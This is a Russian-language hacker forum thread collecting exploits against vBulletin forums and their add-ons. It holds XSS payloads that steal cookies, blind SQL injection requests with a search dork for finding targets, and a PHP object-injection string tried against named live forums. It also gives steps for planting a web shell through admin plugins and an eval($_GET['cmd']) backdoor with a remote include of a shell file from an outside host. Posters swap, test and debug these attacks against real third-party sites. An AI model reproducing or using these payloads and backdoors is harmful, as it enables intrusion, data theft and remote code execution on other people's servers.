![]() |
Vbulletin Password Brute Force
################################################## ##########
## Author: M4k3 ## ## Script-Version: 1.0.2b ## ## Script-Name: vb_tool.php ## ## Copyright: pldsecurity.de / .com /pldsoft.com ## ## ## ## Comment: Next Version coming soon, check ## ## pldsecurity.com for Updates ## ################################################## ########## Download: http://rapidshare.com/files/13074135...rute_Force.rar |
vBulletin PhotoPost vBGallery v2.x Remote File Upload
vBulletin PhotoPost vBGallery v2.x Remote File Upload http://milw0rm.com/exploits/6082 Некорректная проверка расширения загружаемого файла позволяет залить вебшелл. |
Ajax Reg+XSS
Маленьки баг у хаке Ajax Reg суд в что при установленом этом хаком при регастраци можно выводить html тэги без слэша (/)....и ешо в плагине найден пассивный хсс..
1.Любой версия Vbulletin 2.Ajax Reg v.3.06 http://xaknets.h18.ru/AjaxReg.rar 3.Примые Руки Вывод 1.Пишем в поля логина при регах <b>BAG тоест получайем это жирный шрифт. _http://xaknets.h18.ru/images/1.bmp 2.Тепер как обычно курсив <i>BaG получайем это. _http://xaknets.h18.ru/images/2.bmp 3.Черкныти <u>BaG _http://xaknets.h18.ru/images/3.bmp 4.Тепер самы Главное) ВЫводим вот это Цитата:
_http://xaknets.h18.ru/images/4.bmp вот и все XSS УЯЗВИМОСТЬ http://indimoviez.com/forums/ajax.php?do=CheckUsername¶m="><script>alert("A NTICHAT")</script> |
Vbulletin Doser
Код:
#!"c:\perl\bin\perl.exe" |
vBulletin sql inject Downloads Mod
vBulletin sql inject Downloads Mod
Цитата:
|
vBulletin Version: 3.6.8 Patch Level x
Код:
############################################################### Код:
If an attacker send a link in a pm for example, to the admin with a site |
Active XSS vBulletin <= 3.7.2 L2, 3.6.10 L4
Active XSS vBulletin <= 3.7.2 L2, 3.6.10 L4 _http://securityvulns.ru/Udocument391.html Активка в всплывающем уведомлении о новом входящем ПМ. "Show New Private Message Notification Pop-up" у юзера должно быть включено. В теме ПМ сообщения: Код HTML:
--></script><script>alert(/xss/)</script><!-- |
Vbulletin Plugin ChatBox Xss Vulnerability
Код:
####################################### Vbulletin Plugin ChatBox Xss Vulnerability #http://securityvulns.com/Udocument371.html |
vBulletin 3.7.3 Visitor Message XSS/XSRF + worm Exploit
Код:
/* ----------------------------- |
Multiple Sql Injection in vBulletin 3.7.4
Цитата:
|
HTML & XSS Code Execution Выполнение произвольного HTML и XSS кода.Должен быть установлен файл adminwarn.php, путь и права доступа к нему. 1. Заходим на http://site.com/forum/adminwarn.php?do=addstart&id=123456 Где 123456 - ID сообщения, где будет исполнятся код. Текст предупреждения: Код:
<script>alert('mailbrush H@CK3R')</script>© mailbrush |
HTML & XSS Code Execution x2 Что необходимо? а) Доступ в админку б) Прямые руки, соображение, минимальное знание инета и хтмл. Как работает? Уязвимость заключается в том, что поле "Заголовок" не фильтруется. Начинаем Заходим: Админка - Поля профиля участника - Добавить поле в профиле пользователя. (либо просто http://site.com/admincp/profilefield.php?do=add). Там выбираем: Тип поля профиля - Текстовое поле одной строчкой. Кликаем Далее. В поле заголовок вводим: Код:
<script>alert('mailbrush H@CK3R)</script>а) Админка - Поля профиля участника - Управление полями профиля пользователя. (либо просто http://site.com/admincp/profilefield.php?do=modifycats) Потом выбираем наш Редактировать около нашего <script>alert('mailbrush H@CK3R)</script> (либо просто http://site.com/admincp/profilefield.php?do=edit&profilefieldid=xx, где xx - уникальный ИД, который присвоился полю после добавления), и вуаля - у нас алерт. b) Панель Управления - Личные Данные (либо просто http://site.com/profile.php?do=editprofile), и вуаля - у нас алерт. © mailbrush |
3.0.8 и Last
Из серии давно забыли:
vBulletin <= 3.0.8 Accessible Database Backup Searcher exploits last.php Файл 'last.php' является модулем стороннего разработчика. Стандартный дистрибутив приложения неуязвим. |
vBulletin® Version 3.8.2 Denial of Service Exploit Код:
#!usr/bin/perl |
Заливаем шелл[любая версия] Плагины и Продукты -> Добавить новый плагин -> Во вкладке "Plugin PHP Code" пишем: Код:
$target_path = "images/avatars"; //ваша директория, главное что бы чмод 777 стоялДалее нам нужно место для загрузки: Код:
<form enctype="multipart/form-data" action="ajax.php" method="POST"> |
Injection И новый баг с мнениями в vBulletin.
Баг пашет везде где установлен хак с мнениями, он заключен в редактированием post запроса. Пример - http://www.doneckforum.com/opinion.php. Что бы заюзать баг, нужно врубить tamper data, включить перехватку данных, затем нажать на форуме кнопку записать и затем вмешаться в запрос. Поле value отвечает за оценку которую Вы ставите, затем вводите туда любое число и жмете ок, опа мнение засчиталось! Этоже поле вообще не фильтруется, и там можно провести инъекцию типа
Код:
(if(substring(@@version,1,1)=5,777,666)) |
Blind - SQL Injection Opinion System <= 1.4.3 Тип: SQL - Инъекция Автор: mailbrush Мод (хак): Opinion System <= 1.4.3 О моде: http://www.vbsupport.org/forum/showthread.php?p=272151 Описание: Уязвимость заключается в отсутствии фильтрации входного параметра "value" в файле opinion.php и позволяет удалённому пользователю внедрить SQL - команды в запрос к базе данных. Уязвимый код: opinion.php PHP код:
Код:
POST /[path]/opinion.php HTTP/1.1Код:
[path] - путь к корню форума.Код:
INSERT INTO prefix_opinion (opinionid, fromuserid, touserid, value, dateline, comment, autofill, history, forcehistory) VALUES ([DATA], [DATA], [DATA], [SQL], [DATA], [DATA], [DATA], [DATA], [DATA])Код:
(if(substring(@@version,1,1)=5,777,666))Дорк: Код:
vbulletin inurl:opinion.php |
VBulletin nulled <= 3.8.1 Arbitrary Function Execution
includes/class_core.php@3124: PHP код:
PHP код:
PHP код:
Эксплоит для выполнения phpinfo(): Код:
/forumdisplay.php?f=2&do=doenterpwd&newforumpwd&postvars=6889b08fded154a6c1dae5987bc28aaaad754a2aO:11:"vB_Shutdown":1:{s:8:"shutdown";a:1:{i:0;s:7:"phpinfo";}}http://raz0r.name/obzory/novye-sposoby-obxoda-waf-i-php-eksploity/ |
Цитата:
Потестил немного - на двух форумах фильтрации нет, но почему-то phpinfo() не отображается. Получаю лишь раскрытие путей. Вот пример с хеки)) Код:
http://forum.xeka.ru/forumdisplay.php?f=2&do=doenterpwd&newforumpwd&postvars=6889b08fded154a6c1dae5987bc28aaaad754a2aO:11:%22vB_Shutdown%22:1:{s:8:%22shutdown%22;a:1:{i:0;s:7:%22phpinfo%22;}}Код:
Fatal error: Cannot use object of type vB_Shutdown as array in /home/xek/domains/xeka.ru/public_html/forum/forumdisplay.php on line 169З.Ы. Вот ещё мегаприватфорум: Код:
http://boff.ws/forum/forumdisplay.php?f=2&do=doenterpwd&newforumpwd&postvars=6889b08fded154a6c1dae5987bc28aaaad754a2aO:11:%22vB_Shutdown%22:1:{s:8:%22shutdown%22;a:1:{i:0;s:7:%22phpinfo%22;}}Код:
1||1259872978||||||||Error Opening Logfile. |
В первом примере наверно стоит suhosin patch, который не допускает выполнение деструктора после Fatal Error. Насчет второго, ошибка вообще небулковская
|
Root-access для удачной эксплуатации "плоент" надо немного изменить
|
Цитата:
Да я уже понял, что там ошибка, только пока её не исправил. Структура данных там такая: vB_Shutdown Object ( [shutdown] => Array ( [0] => phpinfo ) ) Надо её исправить... |
Пытался залить шелл по инструкции:
Цитата:
Цитата:
|
budden, попробую вписать eval($_GET[cmd]), дальше site.ru/forum/faq.php?cmd=phpinfo(); или сразу весь код шелла запихнуть, дальше site.ru/forum/faq.php смотри что вышло
P.S не в ту тему написал |
Раскрытие путей
vBulletin® Version 3.8.4 Код:
localhost/vb/calendar.php?do[]=[]add&[]type=[]recur&c=[]%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3EКод:
Warning: trim() expects parameter 1 to be string, array given in C:\xampp\htdocs\vb\includes\class_core.php on line 1651PHP код:
Код:
http://localhost/vb/forumdisplay.php?do[]Код:
Unable to add cookies, header already sent.Код:
Warning: trim() expects parameter 1 to be string, array given in C:\xampp\htdocs\vb\includes\class_core.php on line 1651PHP код:
(C)Xcontrol212 |
Vbulletin 4.0.1 Remote SQL Injection
п.с. хз пашет или нет... Код:
#!/usr/bin/perl |
все пашет :cool: здесь просто код кривоват
гугл в помощь |
регулярка для хоста неправильная, но по всей видимости это спецпорог, т.к. очевидно, что специальная ошибка
|
Цитата:
Код:
$temp = unserialize($check);echo serialize(array('do'=>'do', 'obj' => new vB_Shutdown)); Код:
a:2:{s:2:"do";s:2:"do";s:3:"obj";O:11:"vB_Shutdown":1:{s:8:"shutdown";a:1:{i:0;s:7:"phpinfo";}}}ps У нуленых by DGT 'COOKIE_SALT' не пустой. :( pss, но вполне брутабельный. Брутится исходя из куки "bbforum_view". Например f544eb9368b8ac964d27534650bff240510eb278a-1-{i-3_i-1267278281_} Первые 40 символов это хэш соленого сериал. массива: Код:
$c = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_'; // 36 charsМожет сказать что не существует такого форума, тогда надо будет подшаманить ?f=26 http://site.com/forumdisplay.php?f=26&do=doenterpwd&newforumpwd=&p ostvars=efeba30e34b02bd0fcdb07795c42eaedad5bf111a: 2:{s:2:%22do%22;s:2:%22do%22;s:3:%22obj%22;O:11:%2 2vB_Shutdown%22:1:{s:8:%22shutdown%22;a:3:{i:0;s:7 :%22phpinfo%22;i:1;s:21:%22debug_print_backtrace%2 2;i:2;s:3:%22die%22;}}} Никто так и не придумал как эту багу использовать то? :/ |
Нашол минут 5 назад.
Незнаю боян не боян, но у себя на форуме версии 3.8.2 когда заходишь в профиль можно написать "Публичное сообщение" Такой код проходит свободно. ><script>alert(/byby/)</script> |
vBulletin® версия 3.7.0 Gold
http://forum/serverChecker/?IP=**.**.***.***&port=29901"><script>alert(docume nt.cookie)</script>
(c)Feldmarschall |
Vbulletin 4.0.2 XSS Vulnerability
Код:
=================================# ~ - [ [ : Inj3ct0r : ] ] # Inj3ct0r.com [2010-03-19] |
Как вы задолбали =\
Не надо ставить копирайты на этого inj3ct0r'а - это копипастер\плагиатор. Посмотрите у китайцев, эта бага лежит с 9 числа, и если этот клоун поставил туда своё авторство, это не значит, что он автор http://sebug.net/vulndb/19240/ |
Банальная XSS.
vBulletin® Version 3.8.2 Код:
http://site.ru/forum/modcp/index.php?loc=javascript:document.write('<script>alert(document.cookie);</script>');PS. В теме не нашел, в гугле тоже не заметил, что кто то выкладывал. :rolleyes: |
Цитата:
|
Пассивка в админке.
3.8.2 Цитата:
|
SQL Конфиг в 3.8.6
site.com/forum/faq.php?s=&do=search&q=database&match=all&titleson ly=0 |
Цитата:
|
only 3.8.6 because debug bug ^)
/thread219320.html |
Цитата:
Месторасположение: Vbulletin: Справка - faq_complete Вставляем в тело код нашего шелла eval($_GET['cmd']); Сохраняем, идём в faq (справка), если он был такой eval($_GET['cmd']); делаем так site.сom/forumpath/faq.php?cmd=тут команда site.сom/forumpath/faq.php?cmd=include($_GET[aa]);&aa=http://site.com/shell.txt Требуется allow_url_include = on |
| Время: 10:48 |